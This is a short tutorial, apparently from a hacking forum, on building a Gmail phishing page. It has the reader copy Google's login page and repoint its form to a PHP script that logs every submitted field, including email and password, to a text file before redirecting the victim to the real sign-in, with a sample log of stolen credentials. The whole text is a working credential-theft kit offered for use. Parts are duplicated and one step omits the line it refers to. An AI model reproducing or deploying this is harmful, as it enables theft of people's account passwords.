Step 1.
Go to http://gmail.com
Click File>Save Page As... or Ctrl+ S and save page.
Once you saved, rename ServiceLogin.htm to index.htm so when you upload it to a web
host and someone goes to your link, the index page is the first page that
shows up.
Step 2.
Open text editor and add this code:
PHP Code:
<?php
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle = fopen("logs.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle = fopen("logs.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Save it as mail.php
Now create simple text document and name it logs.txt
Open logs.txt and this:
Now create simple text document and name it logs.txt
Open logs.txt and this:
Code:
ltmpl=default
ltmplcache=2
continue=http://mail.google.com/mail/?
service=mail
rm=false
Email=victim@gmail.com
Passwd=victimpassword
rmShown=1
signIn=Sign
in
Step 3.
Open index.htm with text editor and find this line:
Change it to this and save it:
Open index.htm with text editor and find this line:
Change it to this and save it:
PHP Code:
<form id="gaia_loginform" action="mail.php" method="post">
Step 4.
By now you will have 4files
Upload them all to your hosting
And you are done!